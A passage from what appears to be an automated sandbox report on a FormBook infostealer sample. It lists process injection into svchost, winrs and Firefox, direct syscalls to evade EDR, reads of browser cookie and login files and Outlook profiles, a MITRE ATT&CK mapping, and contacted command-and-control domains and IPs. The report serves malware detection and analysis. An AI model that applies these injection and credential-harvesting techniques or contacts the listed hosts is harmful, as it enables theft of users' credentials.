                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\winrs.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\winrs.exeThread register set: target process: 1196Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\winrs.exeThread APC queued: target process: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2A21008Jump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EAB106 LogonUserW,0_2_00EAB106
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E73D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E73D19
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB411C SendInput,keybd_event,0_2_00EB411C
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB74E7 mouse_event,0_2_00EB74E7
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\KSts9xW7qy.exe"Jump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EAA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EAA66C
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00EB71FA
                Source: KSts9xW7qy.exe, pTPcvfjkbwUWkD.exe, 00000002.00000002.3520402128.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000000.1697274294.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000000.1847846628.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: pTPcvfjkbwUWkD.exe, 00000002.00000002.3520402128.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000000.1697274294.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000000.1847846628.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: KSts9xW7qy.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: pTPcvfjkbwUWkD.exe, 00000002.00000002.3520402128.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000000.1697274294.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000000.1847846628.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: pTPcvfjkbwUWkD.exe, 00000002.00000002.3520402128.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000000.1697274294.0000000001610000.00000002.00000001.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000000.1847846628.0000000000EB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E965C4 cpuid 0_2_00E965C4
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00EC091D
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EEB340 GetUserNameW,0_2_00EEB340
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EA1E8E
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E8DDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1774629160.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3520719360.0000000004150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\winrs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: KSts9xW7qy.exeBinary or memory string: WIN_81
                Source: KSts9xW7qy.exeBinary or memory string: WIN_XP
                Source: KSts9xW7qy.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: KSts9xW7qy.exeBinary or memory string: WIN_XPe
                Source: KSts9xW7qy.exeBinary or memory string: WIN_VISTA
                Source: KSts9xW7qy.exeBinary or memory string: WIN_7
                Source: KSts9xW7qy.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1774629160.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3520719360.0000000004150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00EC8C4F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00EC923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586004 Sample: KSts9xW7qy.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 28 www.dating-apps-az-dn5.xyz 2->28 30 www.beylikduzu616161.xyz 2->30 32 15 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 KSts9xW7qy.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 pTPcvfjkbwUWkD.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 winrs.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 pTPcvfjkbwUWkD.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 thaor56.online 202.92.5.23, 49803, 49820, 49838 VNPT-AS-VNVNPTCorpVN Viet Nam 22->34 36 www.earbudsstore.shop 194.195.220.41, 49895, 49911, 49927 NEXINTO-DE Germany 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                KSts9xW7qy.exe71%ReversingLabsWin32.Trojan.AutoitInject
                KSts9xW7qy.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www70.earbudsstore.shop/0%Avira URL Cloudsafe
                http://www.dating-apps-az-dn5.xyz/pn0u/0%Avira URL Cloudsafe
                http://www.beylikduzu616161.xyz/2nga/100%Avira URL Cloudmalware
                http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1736349235.9785162264&other_args=eyJ1cmkiOiAiLzBnaX0%Avira URL Cloudsafe
                http://www.earbudsstore.shop/0gis/0%Avira URL Cloudsafe
                http://www.orbitoasis.online/k6yn/100%Avira URL Cloudmalware
                http://www.maitreyatoys.world/dvmh/0%Avira URL Cloudsafe
                http://www.dating-apps-az-dn5.xyz0%Avira URL Cloudsafe
                http://www.superiorfencing.net/bwyw/0%Avira URL Cloudsafe
                http://www.dailyfuns.info/n9b0/0%Avira URL Cloudsafe
                http://www.mydreamdeal.click/1ag2/0%Avira URL Cloudsafe
                http://www.thaor56.online/cboa/0%Avira URL Cloudsafe
                http://www.zxyck.net/gxyh/0%Avira URL Cloudsafe
                http://www.75178.club/a4h7/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.mydreamdeal.click
                		188.114.96.3
                		truetrue
                  		unknown
                  www.maitreyatoys.world
                  		194.245.148.189
                  		truetrue
                    		unknown
                    www.zxyck.net
                    		118.107.250.103
                    		truefalse
                      		high
                      www.dating-apps-az-dn5.xyz
                      		199.59.243.228
                      		truetrue
                        		unknown
                        superiorfencing.net
                        		103.230.159.86
                        		truetrue
                          		unknown
                          thaor56.online
                          		202.92.5.23
                          		truetrue
                            		unknown
                            www.zkdamdjj.shop
                            		188.114.96.3
                            		truefalse
                              		high
                              www.earbudsstore.shop
                              		194.195.220.41
                              		truetrue
                                		unknown
                                www.beylikduzu616161.xyz
                                		188.114.97.3
                                		truetrue
                                  		unknown
                                  www.dailyfuns.info
                                  		209.74.77.109
                                  		truetrue
                                    		unknown
                                    gtml.huksa.huhusddfnsuegcdn.com
                                    		23.167.152.41
                                    		truefalse
                                      		high
                                      orbitoasis.online
                                      		66.29.132.194
                                      		truetrue
                                        		unknown
                                        www.75178.club
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.orbitoasis.online
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.superiorfencing.net
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.thaor56.online
                                              		unknown
                                              		unknownfalse
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.beylikduzu616161.xyz/2nga/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.superiorfencing.net/bwyw/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.maitreyatoys.world/dvmh/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.orbitoasis.online/k6yn/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.earbudsstore.shop/0gis/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.dailyfuns.info/n9b0/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.dating-apps-az-dn5.xyz/pn0u/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.mydreamdeal.click/1ag2/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.thaor56.online/cboa/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.75178.club/a4h7/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.zxyck.net/gxyh/true
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabwinrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icowinrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1736349235.9785162264&other_args=eyJ1cmkiOiAiLzBnaXwinrs.exe, 00000003.00000002.3521201601.00000000043BC000.00000004.10000000.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.00000000032FC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.dating-apps-az-dn5.xyzpTPcvfjkbwUWkD.exe, 00000005.00000002.3522074275.0000000004D85000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ac.ecosia.org/autocomplete?q=winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://joker.com/?pk_campaign=Parking&pk_kwd=textwinrs.exe, 00000003.00000002.3521201601.0000000004D28000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000003.00000002.3522437440.0000000006070000.00000004.00000800.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.0000000003C68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://www70.earbudsstore.shop/pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.00000000032FC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referwinrs.exe, 00000003.00000002.3521201601.0000000004098000.00000004.10000000.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.0000000002FD8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwinrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      194.195.220.41
                                                                      		www.earbudsstore.shopGermany
                                                                      		6659NEXINTO-DEtrue
                                                                      209.74.77.109
                                                                      		www.dailyfuns.infoUnited States
                                                                      		31744MULTIBAND-NEWHOPEUStrue
                                                                      188.114.97.3
                                                                      		www.beylikduzu616161.xyzEuropean Union
                                                                      		13335CLOUDFLARENETUStrue
                                                                      103.230.159.86
                                                                      		superiorfencing.netAustralia
                                                                      		133159MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAUtrue
                                                                      194.245.148.189
                                                                      		www.maitreyatoys.worldGermany
                                                                      		5517CSLDEtrue
                                                                      23.167.152.41
                                                                      		gtml.huksa.huhusddfnsuegcdn.comReserved
                                                                      		395774ESVC-ASNUSfalse
                                                                      188.114.96.3
                                                                      		www.mydreamdeal.clickEuropean Union
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      66.29.132.194
                                                                      		orbitoasis.onlineUnited States
                                                                      		19538ADVANTAGECOMUStrue
                                                                      118.107.250.103
                                                                      		www.zxyck.netHong Kong
                                                                      		24321OCENET-AS-APOCESdnBhdISPMYfalse
                                                                      199.59.243.228
                                                                      		www.dating-apps-az-dn5.xyzUnited States
                                                                      		395082BODIS-NJUStrue
                                                                      202.92.5.23
                                                                      		thaor56.onlineViet Nam
